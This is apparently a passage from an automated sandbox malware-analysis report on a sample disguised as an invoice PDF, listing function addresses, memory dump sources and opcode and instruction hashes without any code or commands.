                                                                                      • Instruction Fuzzy Hash: 32218131A00209EFCB558F68D8589DE7FB6EF8C320F145129E515B7390CA719D85DFA0
                                                                                      Function 066AB1A2 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 634515c94a458b2d237befd99632c7af4516c1d57e25c13da70b6189feda4b83
                                                                                      • Instruction ID: 84d20e729cca1795d2f6f9f55a0a912dc327fce538cd0af8b3e8961ba5ec99d8
                                                                                      • Opcode Fuzzy Hash: 634515c94a458b2d237befd99632c7af4516c1d57e25c13da70b6189feda4b83
                                                                                      • Instruction Fuzzy Hash: 3F21C1707002045FDB84EF68E8557AFBBE6EB88310F10957DE10AC7685DE709E459BE4
                                                                                      Function 00D1D3EC Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208040237.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d1d000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5768065937ed35f83f15adc5fc220377e37a480b46191e6429f560cbcde17e7
                                                                                      • Instruction ID: 1d67c6fe1aedc50b3590ec19c907eaec0fd2ce6d3dcd51ca42bfd67f18d300b4
                                                                                      • Opcode Fuzzy Hash: a5768065937ed35f83f15adc5fc220377e37a480b46191e6429f560cbcde17e7
                                                                                      • Instruction Fuzzy Hash: 22216AB1104200FFDB04DF14E9C0B66BF66FB98320F24C569E9490B246C736E886C7B1
                                                                                      Function 066AF4E0 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bdc674b8d7892d37aebfa5f06fe43cd2e48eaa3ccfc89ae882dca0ee90494e8e
                                                                                      • Instruction ID: 2d2b1f02bb555edfcce33901ffc17e029f1411e986e5ab28935816a586ad6e5c
                                                                                      • Opcode Fuzzy Hash: bdc674b8d7892d37aebfa5f06fe43cd2e48eaa3ccfc89ae882dca0ee90494e8e
                                                                                      • Instruction Fuzzy Hash: 63213671E002099FEB84DEB8D544BAEBBF5AB58340F10C066D919DB290E734CE51DF92
                                                                                      Function 066AC1A7 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a382764c9711312b708027ee94787b289044b1f149cc7df325e8300b305ba2d
                                                                                      • Instruction ID: 75c4b1ce8a9fb7e68339629e480ade03fd749f3dba750dda6557c8aecb092874
                                                                                      • Opcode Fuzzy Hash: 5a382764c9711312b708027ee94787b289044b1f149cc7df325e8300b305ba2d
                                                                                      • Instruction Fuzzy Hash: D021DF35309390AFC7428F68E854BAB7FB5EF86620F04419BF554CB2E2CA20CD05CBA1
                                                                                      Function 00D2D01C Relevance: .1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208067152.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d2d000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 864c19ed072aed1590265e352c6c8ef585c7208d70b9dffd8225c728266d64b7
                                                                                      • Instruction ID: 9b5849033ab96e6adca78e1391d1bb170012eb4db4bf2157e915f1e747797b8e
                                                                                      • Opcode Fuzzy Hash: 864c19ed072aed1590265e352c6c8ef585c7208d70b9dffd8225c728266d64b7
                                                                                      • Instruction Fuzzy Hash: 2F2149B1104240DFCB15DF14EAC4B26BF66FBA4318F24C569E9490B262C336D80BCBB2
                                                                                      Function 06762620 Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b6840b4633a7e5fc5660d214b5ed51808df1e74a5bc319ae93fc636c630bf3d
                                                                                      • Instruction ID: fc7b18cc57dd356c7fc4a91e21e2a04a70c67e668dd82eb422baf3d79a83980a
                                                                                      • Opcode Fuzzy Hash: 3b6840b4633a7e5fc5660d214b5ed51808df1e74a5bc319ae93fc636c630bf3d
                                                                                      • Instruction Fuzzy Hash: F21106327093146FC7649E6AEC506AA7FA9DF85360B1440BAF909CBB53DA21DD41C770
                                                                                      Function 0676E9F0 Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72b57b0a9420ef48621fd5a643afdd85bb0abaf1baea907f9b3f101e64155852
                                                                                      • Instruction ID: 7299267855279872b618deb020db31431a9dfec8431c1022b630620534b78938
                                                                                      • Opcode Fuzzy Hash: 72b57b0a9420ef48621fd5a643afdd85bb0abaf1baea907f9b3f101e64155852
                                                                                      • Instruction Fuzzy Hash: E0215778D49208DFCB84DFAAC8806BCBBF1FB46300F1484AAE808E3251D7715E45CB60
                                                                                      Function 0676EF09 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 260134c493cad1e8e4dc114222efc264d3390b16dec47f988aa353c9b00502e2
                                                                                      • Instruction ID: 16107448150aa166ae188e6fbed1fc781889c1a70cb75f4ce9efb0ce207dfdcf
                                                                                      • Opcode Fuzzy Hash: 260134c493cad1e8e4dc114222efc264d3390b16dec47f988aa353c9b00502e2
                                                                                      • Instruction Fuzzy Hash: 29215374D08209CFDB84CFA9E9406FEBBF5FB49300F148065E918A7251D7345A45CFA1
                                                                                      Function 06507F50 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3677bc35633058f2b912c3b98334c4d2fd9d121a761f4055016a95991e7a5d24
                                                                                      • Instruction ID: 403f56b1a69c8257b642e925af58c6015fb5b62ddc03d1f3148c19a5a607c062
                                                                                      • Opcode Fuzzy Hash: 3677bc35633058f2b912c3b98334c4d2fd9d121a761f4055016a95991e7a5d24
                                                                                      • Instruction Fuzzy Hash: B62119B0E05209DFDB54DFA9C5446AEFBF6BB89300F14C1A9D415A7381D735A982CF90
                                                                                      Function 00D2D005 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208067152.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d2d000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 331160d9e1075da77d1323cac7035f998e0e10b5f445cddd4dc86ee3fc44be3d
                                                                                      • Instruction ID: cd9224509ad72e720598ce0bd3d6dbdc1a6fa645b16c854af61506a5dd4f1e74
                                                                                      • Opcode Fuzzy Hash: 331160d9e1075da77d1323cac7035f998e0e10b5f445cddd4dc86ee3fc44be3d
                                                                                      • Instruction Fuzzy Hash: EE2171755093C08FCB12CF24DA94715BF72EB56314F2981DAD8458B6A7C33AD81ACB72
                                                                                      Function 067667B0 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c861ac12391ee8d556ff1ecfa3416d640d94ed3004279bc25ae13a334b3dcad
                                                                                      • Instruction ID: 4d695fa4c8bd53c8a21e647a2cc52ce39731019e1c7efd259fdf450ab77d4154
                                                                                      • Opcode Fuzzy Hash: 5c861ac12391ee8d556ff1ecfa3416d640d94ed3004279bc25ae13a334b3dcad
                                                                                      • Instruction Fuzzy Hash: B5219D34B002048FC751EF39D898AAABBF6EFC9310F544569E916D7361DB30AD45CBA2
                                                                                      Function 066AC5D0 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 31756d60df20cb28bc8b2355e3b00accefdcd771ae3d7c5426ca670aee4df4dd
                                                                                      • Instruction ID: 5f0fc864caea1980aff1458dc03b31e87ab1982b0be4baa67049dc270511ddd6
                                                                                      • Opcode Fuzzy Hash: 31756d60df20cb28bc8b2355e3b00accefdcd771ae3d7c5426ca670aee4df4dd
                                                                                      • Instruction Fuzzy Hash: 7A118130B003059FDBA4DFA99855BBABBF6AB88700F14912AE505DB380DB31C841DFA0
                                                                                      Function 0676EF18 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: be135bed9bdcbb041d64ec8e2df9212effe71b64df18195ce09eb5486761ab47
                                                                                      • Instruction ID: 6f2b04dae5134d4f8549be2f7c0b761aabb4d3ce51e25afbba56eb87e1bb4450
                                                                                      • Opcode Fuzzy Hash: be135bed9bdcbb041d64ec8e2df9212effe71b64df18195ce09eb5486761ab47
                                                                                      • Instruction Fuzzy Hash: 5F212C78D08209CFDB84DFAAE9446EEBBF6FB89300F10D065E918A3245D7745A41CFA1
                                                                                      Function 06760CD0 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a16599e2c2763cd34e401a704711845a719f628d2f95fd72b0bb1cc89c84cf95
                                                                                      • Instruction ID: 2e1b031cda09ce770677e09609197a7331ec2f5d36b248c25c85e128e95488b4
                                                                                      • Opcode Fuzzy Hash: a16599e2c2763cd34e401a704711845a719f628d2f95fd72b0bb1cc89c84cf95
                                                                                      • Instruction Fuzzy Hash: 63014C323052015FC7151A2DFC809AFEB96EFC86207209A7EF90ACB205CE308D4A83F1
                                                                                      Function 0650090F Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe4062aff5dfa5e0558e8797cbccd74b8b5235e09750d86312309d0cc646d754
                                                                                      • Instruction ID: 88fb58c4869764b3f74f79a5de163dc9ddf2be38b8a761998ece62c47df12350
                                                                                      • Opcode Fuzzy Hash: fe4062aff5dfa5e0558e8797cbccd74b8b5235e09750d86312309d0cc646d754
                                                                                      • Instruction Fuzzy Hash: 4811FEB0E052099FDB44DFA9C8456BFBBF5FF89300F10846AD518E7351DA305A42CBA1
                                                                                      Function 00D1D3E7 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208040237.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d1d000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                      • Instruction ID: 87f2efe77219699a899b68648445f2341ed8220b2198aae643ea11d72f0a95a4
                                                                                      • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                      • Instruction Fuzzy Hash: 92112672404240DFCB16CF00E5C0B56BF72FB98324F28C5A9D8090B656C33AE89ACBA1
                                                                                      Function 00D79442 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e281aeeef491b84588b73fe8af8a9aea67ce22fdf8b32daea32ec4c56546af13
                                                                                      • Instruction ID: 5bf4bb12a750ba5634a0790eacffd90e33d432fce5985015577ff54a6de60c8a
                                                                                      • Opcode Fuzzy Hash: e281aeeef491b84588b73fe8af8a9aea67ce22fdf8b32daea32ec4c56546af13
                                                                                      • Instruction Fuzzy Hash: 3021CF75D04268CFCB20DF24C8A87A8B7B1AF49316F5081E6904EA2220EB754EC5CF25
                                                                                      Function 066AC798 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9075fff43d7cb952ac4ad4f6c982082b7dd74213164a428964d62d94a5a9331
                                                                                      • Instruction ID: e30d163a43d00facc0756dd706b504b8c74f7d3911a22e910112fabaa5b9e97f
                                                                                      • Opcode Fuzzy Hash: e9075fff43d7cb952ac4ad4f6c982082b7dd74213164a428964d62d94a5a9331
                                                                                      • Instruction Fuzzy Hash: 59118B31A01214AFCB65CFA9E884899FBF6FF48210B1085AAE8119B341CA31DD40CBA0
                                                                                      Function 065CE56A Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 44d4cd7331ec1425cecbe9eb5468213e5bb24399ae136640daba03b93de90fc1
                                                                                      • Instruction ID: 203a2429ab3c09f7777f221a2d6dc71d3fc578643aaecc292d63b827a71ef426
                                                                                      • Opcode Fuzzy Hash: 44d4cd7331ec1425cecbe9eb5468213e5bb24399ae136640daba03b93de90fc1
                                                                                      • Instruction Fuzzy Hash: A6119C76A00118EFDB15DF99D945CDEB7FDFF88350B058166E505E7210EA30AA45CBA0
                                                                                      Function 066AC228 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff5e431603229b25bd2fec49ec66dfc3215fda5499370bb88ea2be259c163b73
                                                                                      • Instruction ID: d0d6e385bfc86cd46af642eeefb5bbeadf39db48ccc886bcdbd53b602661d107
                                                                                      • Opcode Fuzzy Hash: ff5e431603229b25bd2fec49ec66dfc3215fda5499370bb88ea2be259c163b73
                                                                                      • Instruction Fuzzy Hash: F0014436340315AFDB108E59DC94F9F77E9EB89B21F108066FA15CB290C6B1D914DB60
                                                                                      Function 066AC200 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08c5c46b3de70fbaef50dd737d69f8c35477a1b9e1e1e74bac5a58b549bab515
                                                                                      • Instruction ID: dc789c939e828c2580aaa3d724539fd43ff03ceccc9c15c3c3cb6c909ef22f38
                                                                                      • Opcode Fuzzy Hash: 08c5c46b3de70fbaef50dd737d69f8c35477a1b9e1e1e74bac5a58b549bab515
                                                                                      • Instruction Fuzzy Hash: 45018F36309790AFC7028E69EC94D9B7FB9EF8B62031541ABF544CB2A2C620CD05CB61
                                                                                      Function 066AA559 Relevance: .0, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4c5a780f324d921a1e3720fb59f477823b2dc953fb43250854437043b4e46b9b
                                                                                      • Instruction ID: b6f073c16c25bdee1ebc65dadc0297780a10040286c0b54fb4877e8f14b16298
                                                                                      • Opcode Fuzzy Hash: 4c5a780f324d921a1e3720fb59f477823b2dc953fb43250854437043b4e46b9b
                                                                                      • Instruction Fuzzy Hash: 5E014070D05308AFC794DFE4D900AADBBF4EB89310F1085EAD80897351EA315E45DBA5
                                                                                      Function 066ACA60 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 609cf6d5e4850fdda0d357cba518a291086924f55910257a0bf24ee575a31c7c
                                                                                      • Instruction ID: d16c17f7fb5d4a1fa8be107823155c2ba28734f8dd31e3201e4efc09af1fd48d
                                                                                      • Opcode Fuzzy Hash: 609cf6d5e4850fdda0d357cba518a291086924f55910257a0bf24ee575a31c7c
                                                                                      • Instruction Fuzzy Hash: 6C01D673608661AFC301CB5DD880952FBA6FB86320755C667E628CB682C721EC57CBE0
                                                                                      Function 06764EE0 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ca35ec3814f2fc72ca8efb010f2f16e73aa5ec28ae60d22c6ee80082168c55b
                                                                                      • Instruction ID: 435a52c4f7a17ab033e13a766a528646af833671995ea4feb44910c7d959ff12
                                                                                      • Opcode Fuzzy Hash: 0ca35ec3814f2fc72ca8efb010f2f16e73aa5ec28ae60d22c6ee80082168c55b
                                                                                      • Instruction Fuzzy Hash: 15019E383006119FC7469B24E854A6ABBE6FFCE7017108469EA06CB395CF31EC06CBE1
                                                                                      Function 06766FD8 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 723de4dcfec70f9da6ffefdcef49e5a1d4ca01a38fe95e09c08c6a44ea80e317
                                                                                      • Instruction ID: 0edfae17fa6a81399f275034a17e6ad0c4dda31a7dd776e16a0205edc96b7c7d
                                                                                      • Opcode Fuzzy Hash: 723de4dcfec70f9da6ffefdcef49e5a1d4ca01a38fe95e09c08c6a44ea80e317
                                                                                      • Instruction Fuzzy Hash: 520104303103009FC36A9B31C858A7B7BA2AF85368F04855DFA568B395CB76EC02D7A0
                                                                                      Function 06507F42 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd5f6f17f83c133d93a6fe1dab0767ff0bcae8aafcbc4f5c5b1769c4c36a81f0
                                                                                      • Instruction ID: 8879646c0baf6899ee11a299f37ee65b69e66af4ad86492d28250b50d92d2ef4
                                                                                      • Opcode Fuzzy Hash: fd5f6f17f83c133d93a6fe1dab0767ff0bcae8aafcbc4f5c5b1769c4c36a81f0
                                                                                      • Instruction Fuzzy Hash: 3F111EB0D093099FDB54DFA9C9405AEBFF9BB89300F5481AAD448D3291E7309A45CFA1
                                                                                      Function 066AB648 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5122da336da0d54637e3134dbf477588f7eb010a59f1534d54f3227052c0569
                                                                                      • Instruction ID: a6d0f5736ff36326063a744d0630d18395c2381a59a30d9aeb836e20ffcbe959
                                                                                      • Opcode Fuzzy Hash: d5122da336da0d54637e3134dbf477588f7eb010a59f1534d54f3227052c0569
                                                                                      • Instruction Fuzzy Hash: 53F04C71B053206FE351471A9C10BABFFBDEBC9310F04446AE5049B352CA71AC45CBE4
                                                                                      Function 065C2301 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 99a4bf0216c95e87c819c43668a3168f64634fbd394877b2e5af9b236dc3e83b
                                                                                      • Instruction ID: 5b7523e9acc3048dbb65833fc74db9df168606ad17493b585827db91d8ba06b4
                                                                                      • Opcode Fuzzy Hash: 99a4bf0216c95e87c819c43668a3168f64634fbd394877b2e5af9b236dc3e83b
                                                                                      • Instruction Fuzzy Hash: 6601B570905208EFCB51DFA4D900AADBFF4EB45320F1485DAA80497252DA315B51EBA2
                                                                                      Function 065C9191 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13ead8c04067d3d47a17292dff52599e600bebc3a133c00b597481ea527a229f
                                                                                      • Instruction ID: 1c5ac960de70941dc0d650fa2bc2ffab936662550530a3fdfaa757b6cdf317f4
                                                                                      • Opcode Fuzzy Hash: 13ead8c04067d3d47a17292dff52599e600bebc3a133c00b597481ea527a229f
